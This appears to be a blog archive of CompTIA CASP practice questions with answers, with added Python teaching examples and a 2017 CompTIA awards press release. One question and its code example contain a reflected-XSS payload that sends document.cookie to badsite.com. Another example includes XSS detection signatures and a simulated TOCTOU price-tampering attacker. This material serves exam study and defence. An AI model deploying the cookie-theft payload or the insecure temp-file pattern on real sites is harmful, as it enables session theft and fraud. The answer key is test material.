An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure?
A. Replicate NAS changes to the tape backups at the other datacenter.
B. Ensure each server has two HBAs connected through two routes to the NAS.
C. Establish deduplication across diverse storage paths.
D. Establish a SAN that replicates between datacenters.
Answer: D
Thursday, 6 December 2018
Sunday, 15 July 2018
CompTIA RC0-C02 Question Answer
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" +
request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
Answer: A
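Added example, not part of the exam question or the original post: the reflected-XSS payload from the log line above, a WAF-style signature check that would stop it at the edge (the quick fix the question asks for), and the output-encoding change the developer still has to make. The payload string is a constructed reconstruction of the logged value, and the signature list is illustrative only, not a real WAF ruleset.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed sample: the parameter value reflected in the log line above,
# written out as the attacker would send it (URL-decoded for readability).
LOGGED_PAYLOAD = (
    "'><script>document.location='http://badsite.com/?q='+document.cookie</script>"
)

# Stop-gap (what a WAF does): signatures for reflected-XSS probes in request
# parameters. A real WAF ruleset is far broader; this only shows the mechanism.
XSS_SIGNATURES = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"document\s*\.\s*(cookie|location)", re.I),
]


def waf_blocks(param_value: str) -> bool:
    """True if the URL-decoded parameter matches a known XSS signature."""
    decoded = unquote_plus(param_value)
    return any(p.search(decoded) for p in XSS_SIGNATURES)


def render_vulnerable(credentials: str) -> str:
    """What the logged server-side template effectively does: raw concatenation."""
    return "<input name='credentials' type='TEXT' value='" + credentials + "'>"


def render_fixed(credentials: str) -> str:
    """Developer fix: HTML-attribute-encode before interpolating into markup."""
    safe = html.escape(credentials, quote=True)  # escapes & < > " and '
    return "<input name='credentials' type='TEXT' value='" + safe + "'>"


def breaks_out_of_attribute(markup: str) -> bool:
    """Crude check: did a <script> tag survive into the rendered page?"""
    return "<script" in markup.lower()
```

The WAF check buys time but is bypassable by encoding tricks the signatures do not anticipate; the encoding in `render_fixed` is the actual fix, which is why the exam treats the WAF as the stop-gap rather than the replacement for input validation and output encoding.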
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
A. Software-based root of trust
B. Continuous chain of trust
C. Chain of trust with a hardware root of trust
D. Software-based trust anchor with no root of trust
Answer: C
Wednesday, 28 February 2018
CompTIA RC0-C02 Question Answer
A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?
A. Client side input validation
B. Stored procedure
C. Encrypting credit card details
D. Regular expression matching
Answer: D
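Added example, not from the exam or the post: server-side regex matching for a card-number field, layered with a Luhn checksum so that a random digit string of the right shape is rejected as well. The issuer prefixes in the regex are a deliberately small constructed set, not a complete issuer table; the numbers used in the checks are the widely published payment-gateway test PANs.

```python
import re

# Shape check: digits only, 13-19 digits after stripping separators, and a
# plausible issuer prefix. Constructed, intentionally small prefix set:
# Visa (4, 13 or 16 digits), Mastercard (51-55, 16), Amex (34/37, 15).
PAN_RE = re.compile(r"^(?:4\d{12}(?:\d{3})?|5[1-5]\d{14}|3[47]\d{13})$")


def normalize(raw: str) -> str:
    """Strip the spaces and hyphens users type; anything else is left for the regex to reject."""
    return re.sub(r"[ -]", "", raw)


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 checksum: doubles every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = ord(ch) - 48
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def validate_card_number(raw: str) -> bool:
    """Accept only input that is well-formed (regex) AND passes Luhn."""
    digits = normalize(raw)
    return bool(PAN_RE.fullmatch(digits)) and luhn_ok(digits)
```

The regex is what stops malformed input (markup, SQL fragments, wrong lengths) from ever reaching the payment logic; the Luhn step catches typos and fabricated numbers the regex alone would let through. Both run on the server, because client-side validation (option A) can be bypassed by sending the request directly.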
A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action?
A. Investigate the network traffic and block UDP port 3544 at the firewall
B. Remove the system from the network and disable IPv6 at the router
C. Locate and remove the unauthorized 6to4 relay from the network
D. Disable the switch port and block the 2001::/32 traffic at the firewall
Answer: A
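Added example, not from the exam or the post: 2001::/32 is the Teredo prefix (6to4 uses 2002::/16), and Teredo tunnels IPv6 inside IPv4 UDP datagrams to port 3544, which is how a host reaches IPv6 addresses on a network with no IPv6 routing. The helper below classifies the prefix, decodes the Teredo server, client address and port embedded in such an address, and maps the outer-flow indicators an analyst would block. The sample address is a constructed value laid out according to RFC 4380 (server 65.54.227.120, cone flag, client 192.0.2.45 on UDP 40000).

```python
import ipaddress

TEREDO_PREFIX = ipaddress.ip_network("2001::/32")
SIXTO4_PREFIX = ipaddress.ip_network("2002::/16")
TEREDO_UDP_PORT = 3544
PROTO_UDP = 17
PROTO_IPV6_IN_IPV4 = 41  # used by 6to4 and configured 6in4 tunnels


def classify(addr: str) -> str:
    """Which transition mechanism, if any, a destination address belongs to."""
    ip = ipaddress.IPv6Address(addr)
    if ip in TEREDO_PREFIX:
        return "teredo"
    if ip in SIXTO4_PREFIX:
        return "6to4"
    return "other"


def parse_teredo(addr: str) -> dict:
    """Decode the fields a Teredo address embeds (RFC 4380 section 4):
    2001:0000 | server IPv4 | flags | client port ^ 0xFFFF | client IPv4 ^ 0xFFFFFFFF
    """
    ip = ipaddress.IPv6Address(addr)
    if ip not in TEREDO_PREFIX:
        raise ValueError(f"{addr} is not a Teredo address")
    raw = int(ip)
    server = ipaddress.IPv4Address((raw >> 64) & 0xFFFFFFFF)
    flags = (raw >> 48) & 0xFFFF
    port = ((raw >> 32) & 0xFFFF) ^ 0xFFFF
    client = ipaddress.IPv4Address((raw & 0xFFFFFFFF) ^ 0xFFFFFFFF)
    return {
        "server": str(server),
        "cone": bool(flags & 0x8000),
        "client": str(client),
        "client_port": port,
    }


def tunnel_indicator(proto: int, dst_port) -> str:
    """What to block at an IPv4-only firewall for a given outer flow."""
    if proto == PROTO_UDP and dst_port == TEREDO_UDP_PORT:
        return "teredo: block UDP/3544"
    if proto == PROTO_IPV6_IN_IPV4:
        return "6to4/6in4: block IP protocol 41"
    return "none"
```

Decoding the address tells the investigator which public Teredo server the host used and what the host's NAT-mapped IPv4 address and port were, which is useful evidence before the firewall rule goes in; a 6to4 relay (option C) would show up as protocol 41 traffic and a 2002::/16 destination, not this prefix.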
Thursday, 28 December 2017
CompTIA RC0-C02 Question Answer
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur?
A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.
Answer: A
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?
A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free
F. Input validation
Answer: E
Tuesday, 5 September 2017
CompTIA RC0-C02 Question Answer
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web-based shopping cart.
SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);
The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking
Answer: C
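Added example, not from the exam or the post: the predictable /tmp naming the question describes, beside a hardened version. The attacker's action inside the race window is simulated with a callback rather than a competing process so the demo runs deterministically offline; the item name, price and directory are constructed.

```python
import os
import tempfile
from datetime import date


def predictable_tmp_name(user_input: str, today: date) -> str:
    """The name the vulnerable cart uses: attacker-controlled input + MM-DD-YYYY.
    (user_input is also not sanitised, so '../' traversal would work too.)"""
    return f"{user_input}-{today.strftime('%m-%d-%Y')}.tmp"


def vulnerable_checkout(tmpdir, user_input, price, today, attacker=None):
    """Write the price to a predictably named file, then re-open it BY NAME to
    read it back. The gap between the two opens is the TOCTOU window."""
    path = os.path.join(tmpdir, predictable_tmp_name(user_input, today))
    with open(path, "w") as f:          # attacker can pre-create this path or a symlink
        f.write(price)
    if attacker:
        attacker(tmpdir, today)          # simulated attacker acting in the window
    with open(path) as f:                # re-resolves the name: reads attacker's data
        return f.read()


def hardened_checkout(tmpdir, user_input, price, today, attacker=None):
    """Unpredictable name created with O_CREAT|O_EXCL and mode 0600 (mkstemp),
    and the data is read back through the same descriptor, never by path."""
    fd, path = tempfile.mkstemp(dir=tmpdir, suffix=".tmp")
    try:
        os.write(fd, price.encode())
        if attacker:
            attacker(tmpdir, today)      # attacker cannot guess the name, and the
        os.lseek(fd, 0, os.SEEK_SET)     # descriptor is not re-resolved anyway
        return os.read(fd, 64).decode()
    finally:
        os.close(fd)
        os.unlink(path)


def attacker_rewrites_price(tmpdir, today):
    """Attacker knows the item name and the date, so knows the exact path."""
    target = os.path.join(tmpdir, predictable_tmp_name("smartphone", today))
    if os.path.exists(target):
        with open(target, "w") as f:
            f.write("0.01")


def demo():
    """Run both versions against the same simulated attacker; returns (vuln, safe)."""
    today = date(2013, 12, 25)
    with tempfile.TemporaryDirectory() as d:
        vuln = vulnerable_checkout(d, "smartphone", "599.00", today, attacker_rewrites_price)
        safe = hardened_checkout(d, "smartphone", "599.00", today, attacker_rewrites_price)
    return vuln, safe
```

The ADDSLASHES() call only addresses SQL injection (option B); it does nothing about a file whose name an attacker can compute in advance and whose contents are trusted after a second open. Keeping the price in the session or database, rather than in a file at all, removes the window entirely.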
Sunday, 18 June 2017
CompTIA Presents 2017 Excellence in Cybersecurity Awards As New Survey Finds 83% of IT Professionals Spending More Time on Cyber Than Just Two Years Ago

CompTIA today announced its 2017 CompTIA Excellence in Cybersecurity Awards to Rep. Jim Langevin (D-RI), Sen. Mike Rounds (R-SD) and Lisa Dorr, Director of IT Workforce Planning and Development, Office of the Chief Information Officer, Department of Health and Human Services (HHS).
The CompTIA Excellence in Cybersecurity Awards recognize members of Congress and federal agency program managers who are making significant advances in using federal resources wisely to improve the cybersecurity skills of those who work for the United States Government.
The awards come at a time when cybersecurity occupies far more resources than ever before, according to a new survey of information technology (IT) professionals in the United States. More than 80 percent of IT professionals say cybersecurity is consuming more of their time than just one or two years ago, and 87 percent predict that the cyber threat landscape will only worsen.
"With our nation's workforce facing a serious cybersecurity skills deficit, our three winners are committed to ensuring that federal IT workers can meet the demands of the rapidly changing cyber-threat landscape," said Todd Thibodeaux, President and CEO of CompTIA. "With so much sensitive data at risk, these honorees are leading the charge to ensure that government workers have the skills and resources to protect federal systems now and in the future."
IT professionals surveyed by CompTIA do not see a single silver bullet that would allow the government to close the cyber-skills gap in the federal workforce. Building the best and most effective federal cybersecurity workforce will require a multifaceted approach, combining formal education, on-the-job training, changes to workplace culture and compensation incentives.
The survey also found that:
76 percent of IT professionals believe the government should offer more competitive wages and flexible work arrangements for its technology workers
72 percent said the government should do a better job of identifying and promoting career paths for civilian and military government cyber professionals
61 percent said the government should improve or expand cyber scholarship programs that offset education costs in exchange for government service
59 percent said government employers should be better educated about, and more accepting of, cyber professionals without four-year university degrees
About Excellence in Cyber Security
Representative Jim Langevin (D-RI)
Representative Langevin has been one of the House's key voices on cybersecurity issues through his leadership on the House Armed Services Committee's Emerging Threats Subcommittee and the Subcommittee on Cybersecurity, Infrastructure Protection and Security Technologies. Rep. Langevin has promoted a competition introducing high school students to the rapidly growing field of cybersecurity and obtained funding to begin other workforce development initiatives. These proposals are crucial to ensuring that we build the next generation of the cyber workforce.
Sen. Mike Rounds (R-SD)
As chair of the Senate Cybersecurity Subcommittee, Sen. Rounds has been instrumental in overseeing Department of Defense programs related to cyber forces and capabilities. Sen. Rounds also sponsored the DOD Cyber Scholarship Program Act, which seeks to modify and enhance an existing DOD scholarship program for students pursuing degrees in cybersecurity fields. Such a move would represent an important step towards supporting the country's continued need for a strong cyber workforce.
Lisa Dorr, Director of IT Workforce Planning and Development and Deputy Director for Personnel, Office of Information Security (OIS), United States Department of Health and Human Services
Lisa Dorr's work at the Department of Health and Human Services implementing the Federal Cybersecurity Workforce Assessment Act has been a critical step in securing the personal information of millions of Americans. Through her leadership, Lisa has spearheaded HHS' efforts to develop and implement vital cybersecurity policies and processes, execute intelligent workforce development strategies, and deliver much-needed security training and awareness that will ultimately lead to increased protection across the department's most sensitive networks.
Wednesday, 3 May 2017
CompTIA RC0-C02 Question Answer
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?
A. vTPM
B. HSM
C. TPM
D. INE
Answer: A
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?
A. Encryption of each individual partition
B. Encryption of the SSD at the file level
C. FDE of each logical volume on the SSD
D. FDE of the entire SSD as a single disk
Answer: A
Subscribe to:
Posts (Atom)